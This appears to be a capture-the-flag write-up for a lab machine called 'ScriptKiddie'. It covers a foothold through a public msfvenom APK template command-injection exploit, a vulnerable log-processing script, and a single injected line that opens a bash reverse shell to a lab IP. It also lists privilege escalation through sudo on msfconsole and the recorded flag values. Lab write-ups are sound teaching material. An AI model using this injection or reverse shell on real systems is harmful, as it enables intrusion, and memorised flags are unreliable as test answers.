ScriptKiddie

##
Enumeration

Ports and Services

Software Installed:

• NMap 7.80

Website:

Nmap Scan Results:

Initial Foothold

The payloads tool is using msvenom… version unknown.
There is an exploit https://www.exploit-db.com/exploits/49491 where you can inject commands into a template file.

Used msfconsole to generate a custom apk file:

Uploaded it into the payload section and received a shell:

User.txt Proof Screenshot

**User.txt Contents
be9a8fa46d406c5bb5e4452d76f539dd

Notes:
Created ssh keypair and uploaded id_rsa.pub to local users authroized key and ssh in.**

Privilege Escalation

Script in /home/pwn called scanlosers.sh:
Looks like it is pulling info form a log file called hackers in kid directory and running nmap against.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

As user kid:

echo " test   ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.54/7777 0>&1' #" >> hackers

Received a shell as pwn:

User pwn has nopassword sudo on msfconsole:

Sudo msfconsole and received a root shell

RootScreenshot Here:

Root.txt Contents:
86301814fac8669d573182b79117d51b